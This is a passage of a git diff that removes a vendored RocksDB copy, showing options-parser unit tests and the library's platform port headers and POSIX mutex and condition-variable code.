-  ASSERT_OK(parser.Parse(kTestFileName, env_.get(),
-                         true /* ignore_unknown_options */));
-}
-
-TEST_F(OptionsParserTest, ParseVersion) {
-  DBOptions db_opt;
-  db_opt.max_open_files = 12345;
-  db_opt.max_background_flushes = 301;
-  db_opt.max_total_wal_size = 1024;
-  ColumnFamilyOptions cf_opt;
-
-  std::string file_template =
-      "# This is a testing option string.\n"
-      "# Currently we only support \"#\" styled comment.\n"
-      "\n"
-      "[Version]\n"
-      "  rocksdb_version=3.13.1\n"
-      "  options_file_version=%s\n"
-      "[DBOptions]\n"
-      "[CFOptions \"default\"]\n";
-  const int kLength = 1000;
-  char buffer[kLength];
-  RocksDBOptionsParser parser;
-
-  const std::vector<std::string> invalid_versions = {
-      "a.b.c", "3.2.2b", "3.-12", "3. 1",  // only digits and dots are allowed
-      "1.2.3.4",
-      "1.2.3"  // can only contains at most one dot.
-      "0",     // options_file_version must be at least one
-      "3..2",
-      ".", ".1.2",             // must have at least one digit before each dot
-      "1.2.", "1.", "2.34."};  // must have at least one digit after each dot
-  for (auto iv : invalid_versions) {
-    snprintf(buffer, kLength - 1, file_template.c_str(), iv.c_str());
-
-    parser.Reset();
-    env_->WriteToNewFile(iv, buffer);
-    ASSERT_NOK(parser.Parse(iv, env_.get()));
-  }
-
-  const std::vector<std::string> valid_versions = {
-      "1.232", "100", "3.12", "1", "12.3  ", "  1.25  "};
-  for (auto vv : valid_versions) {
-    snprintf(buffer, kLength - 1, file_template.c_str(), vv.c_str());
-    parser.Reset();
-    env_->WriteToNewFile(vv, buffer);
-    ASSERT_OK(parser.Parse(vv, env_.get()));
-  }
-}
-
-void VerifyCFPointerTypedOptions(
-    ColumnFamilyOptions* base_cf_opt, const ColumnFamilyOptions* new_cf_opt,
-    const std::unordered_map<std::string, std::string>* new_cf_opt_map) {
-  std::string name_buffer;
-  ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(*base_cf_opt, *new_cf_opt,
-                                                  new_cf_opt_map));
-
-  // change the name of merge operator back-and-forth
-  {
-    auto* merge_operator = dynamic_cast<test::ChanglingMergeOperator*>(
-        base_cf_opt->merge_operator.get());
-    if (merge_operator != nullptr) {
-      name_buffer = merge_operator->Name();
-      // change the name  and expect non-ok status
-      merge_operator->SetName("some-other-name");
-      ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-          *base_cf_opt, *new_cf_opt, new_cf_opt_map));
-      // change the name back and expect ok status
-      merge_operator->SetName(name_buffer);
-      ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(*base_cf_opt, *new_cf_opt,
-                                                      new_cf_opt_map));
-    }
-  }
-
-  // change the name of the compaction filter factory back-and-forth
-  {
-    auto* compaction_filter_factory =
-        dynamic_cast<test::ChanglingCompactionFilterFactory*>(
-            base_cf_opt->compaction_filter_factory.get());
-    if (compaction_filter_factory != nullptr) {
-      name_buffer = compaction_filter_factory->Name();
-      // change the name and expect non-ok status
-      compaction_filter_factory->SetName("some-other-name");
-      ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-          *base_cf_opt, *new_cf_opt, new_cf_opt_map));
-      // change the name back and expect ok status
-      compaction_filter_factory->SetName(name_buffer);
-      ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(*base_cf_opt, *new_cf_opt,
-                                                      new_cf_opt_map));
-    }
-  }
-
-  // test by setting compaction_filter to nullptr
-  {
-    auto* tmp_compaction_filter = base_cf_opt->compaction_filter;
-    if (tmp_compaction_filter != nullptr) {
-      base_cf_opt->compaction_filter = nullptr;
-      // set compaction_filter to nullptr and expect non-ok status
-      ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-          *base_cf_opt, *new_cf_opt, new_cf_opt_map));
-      // set the value back and expect ok status
-      base_cf_opt->compaction_filter = tmp_compaction_filter;
-      ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(*base_cf_opt, *new_cf_opt,
-                                                      new_cf_opt_map));
-    }
-  }
-
-  // test by setting table_factory to nullptr
-  {
-    auto tmp_table_factory = base_cf_opt->table_factory;
-    if (tmp_table_factory != nullptr) {
-      base_cf_opt->table_factory.reset();
-      // set table_factory to nullptr and expect non-ok status
-      ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-          *base_cf_opt, *new_cf_opt, new_cf_opt_map));
-      // set the value back and expect ok status
-      base_cf_opt->table_factory = tmp_table_factory;
-      ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(*base_cf_opt, *new_cf_opt,
-                                                      new_cf_opt_map));
-    }
-  }
-
-  // test by setting memtable_factory to nullptr
-  {
-    auto tmp_memtable_factory = base_cf_opt->memtable_factory;
-    if (tmp_memtable_factory != nullptr) {
-      base_cf_opt->memtable_factory.reset();
-      // set memtable_factory to nullptr and expect non-ok status
-      ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(
-          *base_cf_opt, *new_cf_opt, new_cf_opt_map));
-      // set the value back and expect ok status
-      base_cf_opt->memtable_factory = tmp_memtable_factory;
-      ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(*base_cf_opt, *new_cf_opt,
-                                                      new_cf_opt_map));
-    }
-  }
-}
-
-TEST_F(OptionsParserTest, DumpAndParse) {
-  DBOptions base_db_opt;
-  std::vector<ColumnFamilyOptions> base_cf_opts;
-  std::vector<std::string> cf_names = {"default", "cf1", "cf2", "cf3",
-                                       "c:f:4:4:4"
-                                       "p\\i\\k\\a\\chu\\\\\\",
-                                       "###rocksdb#1-testcf#2###"};
-  const int num_cf = static_cast<int>(cf_names.size());
-  Random rnd(302);
-  test::RandomInitDBOptions(&base_db_opt, &rnd);
-  base_db_opt.db_log_dir += "/#odd #but #could #happen #path #/\\\\#OMG";
-
-  BlockBasedTableOptions special_bbto;
-  special_bbto.cache_index_and_filter_blocks = true;
-  special_bbto.block_size = 999999;
-
-  for (int c = 0; c < num_cf; ++c) {
-    ColumnFamilyOptions cf_opt;
-    Random cf_rnd(0xFB + c);
-    test::RandomInitCFOptions(&cf_opt, &cf_rnd);
-    if (c < 4) {
-      cf_opt.prefix_extractor.reset(test::RandomSliceTransform(&rnd, c));
-    }
-    if (c < 3) {
-      cf_opt.table_factory.reset(test::RandomTableFactory(&rnd, c));
-    } else if (c == 4) {
-      cf_opt.table_factory.reset(NewBlockBasedTableFactory(special_bbto));
-    }
-    base_cf_opts.emplace_back(cf_opt);
-  }
-
-  const std::string kOptionsFileName = "test-persisted-options.ini";
-  ASSERT_OK(PersistRocksDBOptions(base_db_opt, cf_names, base_cf_opts,
-                                  kOptionsFileName, env_.get()));
-
-  RocksDBOptionsParser parser;
-  ASSERT_OK(parser.Parse(kOptionsFileName, env_.get()));
-
-  // Make sure block-based table factory options was deserialized correctly
-  std::shared_ptr<TableFactory> ttf = (*parser.cf_opts())[4].table_factory;
-  ASSERT_EQ(BlockBasedTableFactory::kName, std::string(ttf->Name()));
-  const BlockBasedTableOptions& parsed_bbto =
-      static_cast<BlockBasedTableFactory*>(ttf.get())->table_options();
-  ASSERT_EQ(special_bbto.block_size, parsed_bbto.block_size);
-  ASSERT_EQ(special_bbto.cache_index_and_filter_blocks,
-            parsed_bbto.cache_index_and_filter_blocks);
-
-  ASSERT_OK(RocksDBOptionsParser::VerifyRocksDBOptionsFromFile(
-      base_db_opt, cf_names, base_cf_opts, kOptionsFileName, env_.get()));
-
-  ASSERT_OK(
-      RocksDBOptionsParser::VerifyDBOptions(*parser.db_opt(), base_db_opt));
-  for (int c = 0; c < num_cf; ++c) {
-    const auto* cf_opt = parser.GetCFOptions(cf_names[c]);
-    ASSERT_NE(cf_opt, nullptr);
-    ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(
-        base_cf_opts[c], *cf_opt, &(parser.cf_opt_maps()->at(c))));
-  }
-
-  // Further verify pointer-typed options
-  for (int c = 0; c < num_cf; ++c) {
-    const auto* cf_opt = parser.GetCFOptions(cf_names[c]);
-    ASSERT_NE(cf_opt, nullptr);
-    VerifyCFPointerTypedOptions(&base_cf_opts[c], cf_opt,
-                                &(parser.cf_opt_maps()->at(c)));
-  }
-
-  ASSERT_EQ(parser.GetCFOptions("does not exist"), nullptr);
-
-  base_db_opt.max_open_files++;
-  ASSERT_NOK(RocksDBOptionsParser::VerifyRocksDBOptionsFromFile(
-      base_db_opt, cf_names, base_cf_opts, kOptionsFileName, env_.get()));
-
-  for (int c = 0; c < num_cf; ++c) {
-    if (base_cf_opts[c].compaction_filter) {
-      delete base_cf_opts[c].compaction_filter;
-    }
-  }
-}
-
-TEST_F(OptionsParserTest, DifferentDefault) {
-  const std::string kOptionsFileName = "test-persisted-options.ini";
-
-  ColumnFamilyOptions cf_level_opts;
-  cf_level_opts.OptimizeLevelStyleCompaction();
-
-  ColumnFamilyOptions cf_univ_opts;
-  cf_univ_opts.OptimizeUniversalStyleCompaction();
-
-  ASSERT_OK(PersistRocksDBOptions(DBOptions(), {"default", "universal"},
-                                  {cf_level_opts, cf_univ_opts},
-                                  kOptionsFileName, env_.get()));
-
-  RocksDBOptionsParser parser;
-  ASSERT_OK(parser.Parse(kOptionsFileName, env_.get()));
-
-  {
-    Options old_default_opts;
-    old_default_opts.OldDefaults();
-    ASSERT_EQ(10 * 1048576, old_default_opts.max_bytes_for_level_base);
-    ASSERT_EQ(5000, old_default_opts.max_open_files);
-    ASSERT_EQ(2 * 1024U * 1024U, old_default_opts.delayed_write_rate);
-    ASSERT_EQ(WALRecoveryMode::kTolerateCorruptedTailRecords,
-              old_default_opts.wal_recovery_mode);
-  }
-  {
-    Options old_default_opts;
-    old_default_opts.OldDefaults(4, 6);
-    ASSERT_EQ(10 * 1048576, old_default_opts.max_bytes_for_level_base);
-    ASSERT_EQ(5000, old_default_opts.max_open_files);
-  }
-  {
-    Options old_default_opts;
-    old_default_opts.OldDefaults(4, 7);
-    ASSERT_NE(10 * 1048576, old_default_opts.max_bytes_for_level_base);
-    ASSERT_NE(4, old_default_opts.table_cache_numshardbits);
-    ASSERT_EQ(5000, old_default_opts.max_open_files);
-    ASSERT_EQ(2 * 1024U * 1024U, old_default_opts.delayed_write_rate);
-  }
-  {
-    ColumnFamilyOptions old_default_cf_opts;
-    old_default_cf_opts.OldDefaults();
-    ASSERT_EQ(2 * 1048576, old_default_cf_opts.target_file_size_base);
-    ASSERT_EQ(4 << 20, old_default_cf_opts.write_buffer_size);
-    ASSERT_EQ(2 * 1048576, old_default_cf_opts.target_file_size_base);
-    ASSERT_EQ(0, old_default_cf_opts.soft_pending_compaction_bytes_limit);
-    ASSERT_EQ(0, old_default_cf_opts.hard_pending_compaction_bytes_limit);
-    ASSERT_EQ(CompactionPri::kByCompensatedSize,
-              old_default_cf_opts.compaction_pri);
-  }
-  {
-    ColumnFamilyOptions old_default_cf_opts;
-    old_default_cf_opts.OldDefaults(4, 6);
-    ASSERT_EQ(2 * 1048576, old_default_cf_opts.target_file_size_base);
-    ASSERT_EQ(CompactionPri::kByCompensatedSize,
-              old_default_cf_opts.compaction_pri);
-  }
-  {
-    ColumnFamilyOptions old_default_cf_opts;
-    old_default_cf_opts.OldDefaults(4, 7);
-    ASSERT_NE(2 * 1048576, old_default_cf_opts.target_file_size_base);
-    ASSERT_EQ(CompactionPri::kByCompensatedSize,
-              old_default_cf_opts.compaction_pri);
-  }
-  {
-    Options old_default_opts;
-    old_default_opts.OldDefaults(5, 1);
-    ASSERT_EQ(2 * 1024U * 1024U, old_default_opts.delayed_write_rate);
-  }
-  {
-    Options old_default_opts;
-    old_default_opts.OldDefaults(5, 2);
-    ASSERT_EQ(16 * 1024U * 1024U, old_default_opts.delayed_write_rate);
-  }
-
-  Options small_opts;
-  small_opts.OptimizeForSmallDb();
-  ASSERT_EQ(2 << 20, small_opts.write_buffer_size);
-  ASSERT_EQ(5000, small_opts.max_open_files);
-}
-
-class OptionsSanityCheckTest : public OptionsParserTest {
- public:
-  OptionsSanityCheckTest() {}
-
- protected:
-  Status SanityCheckCFOptions(const ColumnFamilyOptions& cf_opts,
-                              OptionsSanityCheckLevel level) {
-    return RocksDBOptionsParser::VerifyRocksDBOptionsFromFile(
-        DBOptions(), {"default"}, {cf_opts}, kOptionsFileName, env_.get(),
-        level);
-  }
-
-  Status PersistCFOptions(const ColumnFamilyOptions& cf_opts) {
-    Status s = env_->DeleteFile(kOptionsFileName);
-    if (!s.ok()) {
-      return s;
-    }
-    return PersistRocksDBOptions(DBOptions(), {"default"}, {cf_opts},
-                                 kOptionsFileName, env_.get());
-  }
-
-  const std::string kOptionsFileName = "OPTIONS";
-};
-
-TEST_F(OptionsSanityCheckTest, SanityCheck) {
-  ColumnFamilyOptions opts;
-  Random rnd(301);
-
-  // default ColumnFamilyOptions
-  {
-    ASSERT_OK(PersistCFOptions(opts));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-  }
-
-  // prefix_extractor
-  {
-    // Okay to change prefix_extractor form nullptr to non-nullptr
-    ASSERT_EQ(opts.prefix_extractor.get(), nullptr);
-    opts.prefix_extractor.reset(NewCappedPrefixTransform(10));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-
-    // persist the change
-    ASSERT_OK(PersistCFOptions(opts));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-
-    // use same prefix extractor but with different parameter
-    opts.prefix_extractor.reset(NewCappedPrefixTransform(15));
-    // expect pass only in kSanityLevelLooselyCompatible
-    ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-
-    // repeat the test with FixedPrefixTransform
-    opts.prefix_extractor.reset(NewFixedPrefixTransform(10));
-    ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-
-    // persist the change of prefix_extractor
-    ASSERT_OK(PersistCFOptions(opts));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-
-    // use same prefix extractor but with different parameter
-    opts.prefix_extractor.reset(NewFixedPrefixTransform(15));
-    // expect pass only in kSanityLevelLooselyCompatible
-    ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-
-    // Change prefix extractor from non-nullptr to nullptr
-    opts.prefix_extractor.reset();
-    // expect pass as it's safe to change prefix_extractor
-    // from non-null to null
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-    ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-  }
-  // persist the change
-  ASSERT_OK(PersistCFOptions(opts));
-  ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-
-  // table_factory
-  {
-    for (int tb = 0; tb <= 2; ++tb) {
-      // change the table factory
-      opts.table_factory.reset(test::RandomTableFactory(&rnd, tb));
-      ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-
-      // persist the change
-      ASSERT_OK(PersistCFOptions(opts));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-    }
-  }
-
-  // merge_operator
-  {
-    for (int test = 0; test < 5; ++test) {
-      // change the merge operator
-      opts.merge_operator.reset(test::RandomMergeOperator(&rnd));
-      ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelNone));
-
-      // persist the change
-      ASSERT_OK(PersistCFOptions(opts));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-    }
-  }
-
-  // compaction_filter
-  {
-    for (int test = 0; test < 5; ++test) {
-      // change the compaction filter
-      opts.compaction_filter = test::RandomCompactionFilter(&rnd);
-      ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-
-      // persist the change
-      ASSERT_OK(PersistCFOptions(opts));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-      delete opts.compaction_filter;
-      opts.compaction_filter = nullptr;
-    }
-  }
-
-  // compaction_filter_factory
-  {
-    for (int test = 0; test < 5; ++test) {
-      // change the compaction filter factory
-      opts.compaction_filter_factory.reset(
-          test::RandomCompactionFilterFactory(&rnd));
-      ASSERT_NOK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelLooselyCompatible));
-
-      // persist the change
-      ASSERT_OK(PersistCFOptions(opts));
-      ASSERT_OK(SanityCheckCFOptions(opts, kSanityLevelExactMatch));
-    }
-  }
-}
-
-namespace {
-bool IsEscapedString(const std::string& str) {
-  for (size_t i = 0; i < str.size(); ++i) {
-    if (str[i] == '\\') {
-      // since we already handle those two consecutive '\'s in
-      // the next if-then branch, any '\' appear at the end
-      // of an escaped string in such case is not valid.
-      if (i == str.size() - 1) {
-        return false;
-      }
-      if (str[i + 1] == '\\') {
-        // if there're two consecutive '\'s, skip the second one.
-        i++;
-        continue;
-      }
-      switch (str[i + 1]) {
-        case ':':
-        case '\\':
-        case '#':
-          continue;
-        default:
-          // if true, '\' together with str[i + 1] is not a valid escape.
-          if (UnescapeChar(str[i + 1]) == str[i + 1]) {
-            return false;
-          }
-      }
-    } else if (isSpecialChar(str[i]) && (i == 0 || str[i - 1] != '\\')) {
-      return false;
-    }
-  }
-  return true;
-}
-}  // namespace
-
-TEST_F(OptionsParserTest, EscapeOptionString) {
-  ASSERT_EQ(UnescapeOptionString(
-                "This is a test string with \\# \\: and \\\\ escape chars."),
-            "This is a test string with # : and \\ escape chars.");
-
-  ASSERT_EQ(
-      EscapeOptionString("This is a test string with # : and \\ escape chars."),
-      "This is a test string with \\# \\: and \\\\ escape chars.");
-
-  std::string readible_chars =
-      "A String like this \"1234567890-=_)(*&^%$#@!ertyuiop[]{POIU"
-      "YTREWQasdfghjkl;':LKJHGFDSAzxcvbnm,.?>"
-      "<MNBVCXZ\\\" should be okay to \\#\\\\\\:\\#\\#\\#\\ "
-      "be serialized and deserialized";
-
-  std::string escaped_string = EscapeOptionString(readible_chars);
-  ASSERT_TRUE(IsEscapedString(escaped_string));
-  // This two transformations should be canceled and should output
-  // the original input.
-  ASSERT_EQ(UnescapeOptionString(escaped_string), readible_chars);
-
-  std::string all_chars;
-  for (unsigned char c = 0;; ++c) {
-    all_chars += c;
-    if (c == 255) {
-      break;
-    }
-  }
-  escaped_string = EscapeOptionString(all_chars);
-  ASSERT_TRUE(IsEscapedString(escaped_string));
-  ASSERT_EQ(UnescapeOptionString(escaped_string), all_chars);
-
-  ASSERT_EQ(RocksDBOptionsParser::TrimAndRemoveComment(
-                "     A simple statement with a comment.  # like this :)"),
-            "A simple statement with a comment.");
-
-  ASSERT_EQ(RocksDBOptionsParser::TrimAndRemoveComment(
-                "Escape \\# and # comment together   ."),
-            "Escape \\# and");
-}
-#endif  // !ROCKSDB_LITE
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-#ifdef GFLAGS
-  ParseCommandLineFlags(&argc, &argv, true);
-#endif  // GFLAGS
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/port/README b/thirdparty/rocksdb/port/README
deleted file mode 100644
index 422563e..0000000
--- a/thirdparty/rocksdb/port/README
+++ /dev/null
@@ -1,10 +0,0 @@
-This directory contains interfaces and implementations that isolate the
-rest of the package from platform details.
-
-Code in the rest of the package includes "port.h" from this directory.
-"port.h" in turn includes a platform specific "port_<platform>.h" file
-that provides the platform specific implementation.
-
-See port_posix.h for an example of what must be provided in a platform
-specific header file.
-
diff --git a/thirdparty/rocksdb/port/dirent.h b/thirdparty/rocksdb/port/dirent.h
deleted file mode 100644
index 7bcc356..0000000
--- a/thirdparty/rocksdb/port/dirent.h
+++ /dev/null
@@ -1,47 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// See port_example.h for documentation for the following types/functions.
-
-#ifndef STORAGE_LEVELDB_PORT_DIRENT_H_
-#define STORAGE_LEVELDB_PORT_DIRENT_H_
-
-#ifdef ROCKSDB_PLATFORM_POSIX
-#include <dirent.h>
-#include <sys/types.h>
-#elif defined(OS_WIN)
-
-namespace rocksdb {
-namespace port {
-
-struct dirent {
-  char d_name[_MAX_PATH]; /* filename */
-};
-
-struct DIR;
-
-DIR* opendir(const char* name);
-
-dirent* readdir(DIR* dirp);
-
-int closedir(DIR* dirp);
-
-}  // namespace port
-
-using port::dirent;
-using port::DIR;
-using port::opendir;
-using port::readdir;
-using port::closedir;
-
-}  // namespace rocksdb
-
-#endif  // OS_WIN
-
-#endif  // STORAGE_LEVELDB_PORT_DIRENT_H_
diff --git a/thirdparty/rocksdb/port/likely.h b/thirdparty/rocksdb/port/likely.h
deleted file mode 100644
index e5ef786..0000000
--- a/thirdparty/rocksdb/port/likely.h
+++ /dev/null
@@ -1,21 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef PORT_LIKELY_H_
-#define PORT_LIKELY_H_
-
-#if defined(__GNUC__) && __GNUC__ >= 4
-#define LIKELY(x)   (__builtin_expect((x), 1))
-#define UNLIKELY(x) (__builtin_expect((x), 0))
-#else
-#define LIKELY(x)   (x)
-#define UNLIKELY(x) (x)
-#endif
-
-#endif  // PORT_LIKELY_H_
diff --git a/thirdparty/rocksdb/port/port.h b/thirdparty/rocksdb/port/port.h
deleted file mode 100644
index 13aa56d..0000000
--- a/thirdparty/rocksdb/port/port.h
+++ /dev/null
@@ -1,21 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <string>
-
-// Include the appropriate platform specific file below.  If you are
-// porting to a new platform, see "port_example.h" for documentation
-// of what the new port_<platform>.h file must provide.
-#if defined(ROCKSDB_PLATFORM_POSIX)
-#include "port/port_posix.h"
-#elif defined(OS_WIN)
-#include "port/win/port_win.h"
-#endif
diff --git a/thirdparty/rocksdb/port/port_example.h b/thirdparty/rocksdb/port/port_example.h
deleted file mode 100644
index 05b3240..0000000
--- a/thirdparty/rocksdb/port/port_example.h
+++ /dev/null
@@ -1,104 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// This file contains the specification, but not the implementations,
-// of the types/operations/etc. that should be defined by a platform
-// specific port_<platform>.h file.  Use this file as a reference for
-// how to port this package to a new platform.
-
-#ifndef STORAGE_LEVELDB_PORT_PORT_EXAMPLE_H_
-#define STORAGE_LEVELDB_PORT_PORT_EXAMPLE_H_
-
-namespace rocksdb {
-namespace port {
-
-// TODO(jorlow): Many of these belong more in the environment class rather than
-//               here. We should try moving them and see if it affects perf.
-
-// The following boolean constant must be true on a little-endian machine
-// and false otherwise.
-static const bool kLittleEndian = true /* or some other expression */;
-
-// ------------------ Threading -------------------
-
-// A Mutex represents an exclusive lock.
-class Mutex {
- public:
-  Mutex();
-  ~Mutex();
-
-  // Lock the mutex.  Waits until other lockers have exited.
-  // Will deadlock if the mutex is already locked by this thread.
-  void Lock();
-
-  // Unlock the mutex.
-  // REQUIRES: This mutex was locked by this thread.
-  void Unlock();
-
-  // Optionally crash if this thread does not hold this mutex.
-  // The implementation must be fast, especially if NDEBUG is
-  // defined.  The implementation is allowed to skip all checks.
-  void AssertHeld();
-};
-
-class CondVar {
- public:
-  explicit CondVar(Mutex* mu);
-  ~CondVar();
-
-  // Atomically release *mu and block on this condition variable until
-  // either a call to SignalAll(), or a call to Signal() that picks
-  // this thread to wakeup.
-  // REQUIRES: this thread holds *mu
-  void Wait();
-
-  // If there are some threads waiting, wake up at least one of them.
-  void Signal();
-
-  // Wake up all waiting threads.
-  void SignallAll();
-};
-
-// Thread-safe initialization.
-// Used as follows:
-//      static port::OnceType init_control = LEVELDB_ONCE_INIT;
-//      static void Initializer() { ... do something ...; }
-//      ...
-//      port::InitOnce(&init_control, &Initializer);
-typedef intptr_t OnceType;
-#define LEVELDB_ONCE_INIT 0
-extern void InitOnce(port::OnceType*, void (*initializer)());
-
-// ------------------ Compression -------------------
-
-// Store the snappy compression of "input[0,input_length-1]" in *output.
-// Returns false if snappy is not supported by this port.
-extern bool Snappy_Compress(const char* input, size_t input_length,
-                            std::string* output);
-
-// If input[0,input_length-1] looks like a valid snappy compressed
-// buffer, store the size of the uncompressed data in *result and
-// return true.  Else return false.
-extern bool Snappy_GetUncompressedLength(const char* input, size_t length,
-                                         size_t* result);
-
-// Attempt to snappy uncompress input[0,input_length-1] into *output.
-// Returns true if successful, false if the input is invalid lightweight
-// compressed data.
-//
-// REQUIRES: at least the first "n" bytes of output[] must be writable
-// where "n" is the result of a successful call to
-// Snappy_GetUncompressedLength.
-extern bool Snappy_Uncompress(const char* input_data, size_t input_length,
-                              char* output);
-
-}  // namespace port
-}  // namespace rocksdb
-
-#endif  // STORAGE_LEVELDB_PORT_PORT_EXAMPLE_H_
diff --git a/thirdparty/rocksdb/port/port_posix.cc b/thirdparty/rocksdb/port/port_posix.cc
deleted file mode 100644
index 129933b..0000000
--- a/thirdparty/rocksdb/port/port_posix.cc
+++ /dev/null
@@ -1,207 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "port/port_posix.h"
-
-#include <assert.h>
-#if defined(__i386__) || defined(__x86_64__)
-#include <cpuid.h>
-#endif
-#include <errno.h>
-#include <sched.h>
-#include <signal.h>
-#include <stdio.h>
-#include <string.h>
-#include <sys/time.h>
-#include <sys/resource.h>
-#include <unistd.h>
-#include <cstdlib>
-#include "util/logging.h"
-
-namespace rocksdb {
-namespace port {
-
-static int PthreadCall(const char* label, int result) {
-  if (result != 0 && result != ETIMEDOUT) {
-    fprintf(stderr, "pthread %s: %s\n", label, strerror(result));
-    abort();
-  }
-  return result;
-}
-
-Mutex::Mutex(bool adaptive) {
-#ifdef ROCKSDB_PTHREAD_ADAPTIVE_MUTEX
-  if (!adaptive) {
-    PthreadCall("init mutex", pthread_mutex_init(&mu_, nullptr));
-  } else {
-    pthread_mutexattr_t mutex_attr;
-    PthreadCall("init mutex attr", pthread_mutexattr_init(&mutex_attr));
-    PthreadCall("set mutex attr",
-                pthread_mutexattr_settype(&mutex_attr,
-                                          PTHREAD_MUTEX_ADAPTIVE_NP));
-    PthreadCall("init mutex", pthread_mutex_init(&mu_, &mutex_attr));
-    PthreadCall("destroy mutex attr",
-                pthread_mutexattr_destroy(&mutex_attr));
-  }
-#else
-  PthreadCall("init mutex", pthread_mutex_init(&mu_, nullptr));
-#endif // ROCKSDB_PTHREAD_ADAPTIVE_MUTEX
-}
-
-Mutex::~Mutex() { PthreadCall("destroy mutex", pthread_mutex_destroy(&mu_)); }
-
-void Mutex::Lock() {
-  PthreadCall("lock", pthread_mutex_lock(&mu_));
-#ifndef NDEBUG
-  locked_ = true;
-#endif
-}
-
-void Mutex::Unlock() {
-#ifndef NDEBUG
-  locked_ = false;
-#endif
-  PthreadCall("unlock", pthread_mutex_unlock(&mu_));
-}
-
-void Mutex::AssertHeld() {
-#ifndef NDEBUG
-  assert(locked_);
-#endif
-}
-
-CondVar::CondVar(Mutex* mu)
-    : mu_(mu) {
-    PthreadCall("init cv", pthread_cond_init(&cv_, nullptr));
-}
-
-CondVar::~CondVar() { PthreadCall("destroy cv", pthread_cond_destroy(&cv_)); }
-
-void CondVar::Wait() {
-#ifndef NDEBUG
-  mu_->locked_ = false;
-#endif
-  PthreadCall("wait", pthread_cond_wait(&cv_, &mu_->mu_));
-#ifndef NDEBUG
-  mu_->locked_ = true;
-#endif
-}
-
